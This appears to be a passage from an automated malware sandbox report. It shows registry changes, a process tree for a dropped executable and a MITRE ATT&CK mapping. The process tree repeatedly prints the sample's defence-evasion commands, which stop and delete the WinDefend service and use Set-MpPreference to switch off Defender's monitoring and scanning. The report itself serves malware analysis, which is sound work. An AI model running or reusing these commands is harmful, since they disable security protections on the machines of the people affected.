Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe

C:\Users\Admin\AppData\Local\Temp\akz005e6f.exe
"C:\Users\Admin\AppData\Local\Temp\akz005e6f.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:652

C:\ProgramData\рАПкеЧСыФе.exe
"C:\ProgramData\рАПкеЧСыФе.exe"
2⤵
- Suspicious use of WriteProcessMemory
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
PID:904

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop WinDefend
3⤵
PID:1036

C:\Windows\system32\sc.exe
sc stop WinDefend
4⤵
PID:3040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc delete WinDefend
3⤵
PID:1148

C:\Windows\system32\sc.exe
sc delete WinDefend
4⤵
PID:3104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
PID:1204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
3⤵
PID:1240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBehaviorMonitoring $true
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
3⤵
PID:1256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBlockAtFirstSeen $true
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4052

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIOAVProtection $true
3⤵
PID:1532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3156

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisablePrivacyMode $true
3⤵
PID:1592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisablePrivacyMode $true
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
3⤵
PID:1772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -SevereThreatDefaultAction 6
3⤵
PID:1888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SevereThreatDefaultAction 6
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1852

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -LowThreatDefaultAction 6
3⤵
PID:2072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -LowThreatDefaultAction 6
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3720

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
3⤵
PID:3788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -ModerateThreatDefaultAction 6
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableScriptScanning $true
3⤵
PID:3812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableScriptScanning $true
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
3⤵
PID:4692

C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe
C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe
1⤵
- Suspicious use of WriteProcessMemory
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
PID:1412

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop WinDefend
2⤵
PID:1104

C:\Windows\system32\sc.exe
sc stop WinDefend
3⤵
PID:3756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc delete WinDefend
2⤵
PID:4020

C:\Windows\system32\sc.exe
sc delete WinDefend
3⤵
PID:4488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4736

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
2⤵
PID:3540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBehaviorMonitoring $true
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Modifies data under HKEY_USERS
PID:3592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
2⤵
PID:4144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBlockAtFirstSeen $true
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Modifies data under HKEY_USERS
PID:4192

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:4276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:848

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisablePrivacyMode $true
2⤵
PID:4688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisablePrivacyMode $true
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Modifies data under HKEY_USERS
PID:4444

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
2⤵
PID:4716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Modifies data under HKEY_USERS
PID:4892

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -SevereThreatDefaultAction 6
2⤵
PID:1100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SevereThreatDefaultAction 6
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Modifies data under HKEY_USERS
PID:2820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -LowThreatDefaultAction 6
2⤵
PID:4308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -LowThreatDefaultAction 6
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
2⤵
PID:576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -ModerateThreatDefaultAction 6
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableScriptScanning $true
2⤵
PID:4236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableScriptScanning $true
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Modifies data under HKEY_USERS
PID:4944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
- Drops file in System32 directory
PID:5116

C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe
C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe
1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
PID:2728

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop WinDefend
2⤵
PID:4780

C:\Windows\system32\sc.exe
sc stop WinDefend
3⤵
PID:4036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc delete WinDefend
2⤵
PID:4892

C:\Windows\system32\sc.exe
sc delete WinDefend
3⤵
PID:5044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:3968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
2⤵
PID:724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBehaviorMonitoring $true
3⤵
- Drops file in System32 directory
PID:4644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
2⤵
PID:3792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBlockAtFirstSeen $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:3108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisablePrivacyMode $true
2⤵
PID:2424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisablePrivacyMode $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
2⤵
PID:2468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3624

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -SevereThreatDefaultAction 6
2⤵
PID:1936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SevereThreatDefaultAction 6
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4328

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -LowThreatDefaultAction 6
2⤵
PID:3776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -LowThreatDefaultAction 6
3⤵
- Drops file in System32 directory
PID:4144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
2⤵
PID:3788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -ModerateThreatDefaultAction 6
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableScriptScanning $true
2⤵
PID:68

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableScriptScanning $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
PID:3904

C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe
C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe
1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
PID:4316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop WinDefend
2⤵
PID:5020

C:\Windows\system32\sc.exe
sc stop WinDefend
3⤵
PID:4120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc delete WinDefend
2⤵
PID:2136

C:\Windows\system32\sc.exe
sc delete WinDefend
3⤵
PID:3740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
2⤵
PID:4780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBehaviorMonitoring $true
3⤵
- Drops file in System32 directory
PID:2096

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
2⤵
PID:2472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBlockAtFirstSeen $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2100

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:3972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisablePrivacyMode $true
2⤵
PID:4940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisablePrivacyMode $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1936

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
2⤵
PID:4472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
3⤵
- Drops file in System32 directory
PID:4328

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -SevereThreatDefaultAction 6
2⤵
PID:4544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SevereThreatDefaultAction 6
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4856

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -LowThreatDefaultAction 6
2⤵
PID:3844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -LowThreatDefaultAction 6
3⤵
- Drops file in System32 directory
PID:3088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
2⤵
PID:4944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -ModerateThreatDefaultAction 6
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1276

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableScriptScanning $true
2⤵
PID:3956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableScriptScanning $true
3⤵
- Drops file in System32 directory
PID:4796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
PID:848

C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe
C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe
1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
PID:2084

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop WinDefend
2⤵
PID:1380

C:\Windows\system32\sc.exe
sc stop WinDefend
3⤵
PID:1588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc delete WinDefend
2⤵
PID:3068

C:\Windows\system32\sc.exe
sc delete WinDefend
3⤵
PID:3820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:2700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4560

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
2⤵
PID:1412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBehaviorMonitoring $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
2⤵
PID:3096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBlockAtFirstSeen $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1264

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:3740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisablePrivacyMode $true
2⤵
PID:4716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisablePrivacyMode $true
3⤵
- Drops file in System32 directory
PID:800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
2⤵
PID:4276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -SevereThreatDefaultAction 6
2⤵
PID:4192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SevereThreatDefaultAction 6
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -LowThreatDefaultAction 6
2⤵
PID:3776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -LowThreatDefaultAction 6
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
2⤵
PID:3748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -ModerateThreatDefaultAction 6
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1208

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableScriptScanning $true
2⤵
PID:412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableScriptScanning $true
3⤵
- Drops file in System32 directory
PID:2756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
PID:4156

C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe
C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe
1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
PID:4216

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop WinDefend
2⤵
PID:5088

C:\Windows\system32\sc.exe
sc stop WinDefend
3⤵
PID:1840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc delete WinDefend
2⤵
PID:3324

C:\Windows\system32\sc.exe
sc delete WinDefend
3⤵
PID:3008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
2⤵
PID:3236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBehaviorMonitoring $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2412

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
2⤵
PID:3244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBlockAtFirstSeen $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:68

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
3⤵
- Drops file in System32 directory
PID:4816

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisablePrivacyMode $true
2⤵
PID:1068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisablePrivacyMode $true
3⤵
- Drops file in System32 directory
PID:2868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
2⤵
PID:856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -SevereThreatDefaultAction 6
2⤵
PID:676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SevereThreatDefaultAction 6
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -LowThreatDefaultAction 6
2⤵
PID:348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -LowThreatDefaultAction 6
3⤵
- Drops file in System32 directory
PID:3576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
2⤵
PID:1108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -ModerateThreatDefaultAction 6
3⤵
- Drops file in System32 directory
PID:3172

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableScriptScanning $true
2⤵
PID:4860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableScriptScanning $true
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
PID:5092

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\02ed78e4e2e1a3551c9bbe87b645b14e_3e009a64-65d7-465c-9098-f2673dd3f416

Download Submit
C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\02ed78e4e2e1a3551c9bbe87b645b14e_3e009a64-65d7-465c-9098-f2673dd3f416

Download Submit
C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\02ed78e4e2e1a3551c9bbe87b645b14e_3e009a64-65d7-465c-9098-f2673dd3f416

Download Submit
C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\02ed78e4e2e1a3551c9bbe87b645b14e_3e009a64-65d7-465c-9098-f2673dd3f416

Download Submit
C:\ProgramData\рАПкеЧСыФе.exe

Download Submit
C:\ProgramData\рАПкеЧСыФе.exe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
